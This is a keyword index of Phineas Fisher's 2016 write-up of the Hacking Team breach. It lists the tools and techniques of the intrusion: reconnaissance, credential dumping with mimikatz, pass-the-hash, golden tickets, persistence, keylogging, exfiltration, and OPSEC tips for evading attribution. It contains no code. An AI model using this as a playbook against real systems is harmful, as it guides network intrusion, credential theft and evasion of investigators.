Hacking Team Writeup
by Phineas Fisher (2016)
Remark |
---|
#antisec |
Phineas is disgusted by “sellouts” |
Hacking Team |
Tor isn’t a panacea |
OPSEC considerations |
Whonix, Tails, Qubes TorVM |
wifislax - wifi cracking distro |
VPN |
Jeremy Hammond busted by correlating home address w/ VPN |
dont hack directly from Tor - blacklists |
DNS tunneling |
command and control |
connect-back shells |
stable servers |
hacked servers |
pay for VPS with Bitcoin |
attribution |
APT |
code and TTP reuse as attribution |
public tools as plausible deniability |
changing tactics to avoid being profiled |
“Google Hacking for Penetration Testers” |
subdomain enumeration |
fierce |
theHarvester |
recon-ng |
whois + reverse whois |
site:domaintools.com |
site:www.find-ip-address.com |
port scanning |
service fingerprinting |
IDS |
“the whole internet is being scanned constantly” |
nmap |
zmap |
masscan |
WhatWeb |
BlindElephant |
social engineering |
data.com/jogsaw |
file metadata |
metagoofil |
FOCA (metadata) |
foothold |
try easy, common techniques first |
spear phishing |
targeted attacks |
buying access |
Joomla |
Joomscan |
VPN appliances |
0-day |
postfix |
reverse engineering |
leveraging bugs in embedded devices |
backdoored firmware |
post exploitation |
backdoor |
busybox |
Responder.py |
Python |
tcpdump |
dsniff |
socat |
GNU screen |
SOCKS proxy |
tgcd |
testing tools and attack kits prior to use |
Responder.py -A |
NoSQL |
MySQL authentication bypass |
mongodb |
RCS |
GridFS |
torrent |
Shodan |
insecure backups |
iSCSI |
Synology |
NAS |
port forwarding |
iscsiadm |
iptables |
vmfs-fuse |
losetup |
fdisk |
mount |
VHD |
pwdump |
cachedump |
lsadump |
registry hives |
proxychains |
smbclient |
Metasploit |
psexec.ps1 |
meterpreter |
process migration |
“load kiwi” |
“creds_wdigest” |
Domain Admin |
PowerShell |
New-MailboxExportRequest |
Microsoft Exchange |
lateral movement |
mimikatz |
sekurlsa::logonpasswords |
sekurlsa::msv |
runas |
PowerUp |
bypassuac |
privilege escalation |
psexec |
WMI |
winexe |
PowerShell Empire invoke-psexec |
sc.exe |
pth-win.exe |
Event ID 7045 “Service Control Manager” |
Event Logs |
wmiexec.py |
pth-wmis |
pass the hash |
wmic |
PSRemoting |
dont recommend opening new protocols |
Windows 10 |
Scheduled Task |
schtasks.exe |
GPO |
GPO logon script |
GPO install msi |
GPO scheduled task |
token stealing - mimikatz token::xxx |
MS14-068 |
Kerberos |
Domain Admin Tickets |
sekurlsa::pth |
process injection |
RAT |
pupy_migrate command |
pupy |
meterpreter-migrate |
psinject_empire |
persistence |
Duqu 2-style persistence |
high uptime servers as targets |
golden ticket |
backup access |
PowerView |
Windows 2000, 2003 lacking PowerShell |
netview.exe |
net view |
Invoke-ShareFinderThreaded |
Select-String |
Out-File |
reading email |
reading SharePoint |
Active Directory |
Nagios |
Get-Keystrokes |
Get-TimedScreenshot |
PowerSploit |
Do-Exfiltration |
nishang |
hunting sysadmins |
CredMan.ps1 |
searching for interesting files |
TrueCrypt volumes |
weak passwords |
passwords.txt |
git repos |
sudo |
password reuse |
GitLab |
“forgot my password” + mailserver access |
ethical hacking |
encrypted email - GPG/PGP |
Enigmail |
Links |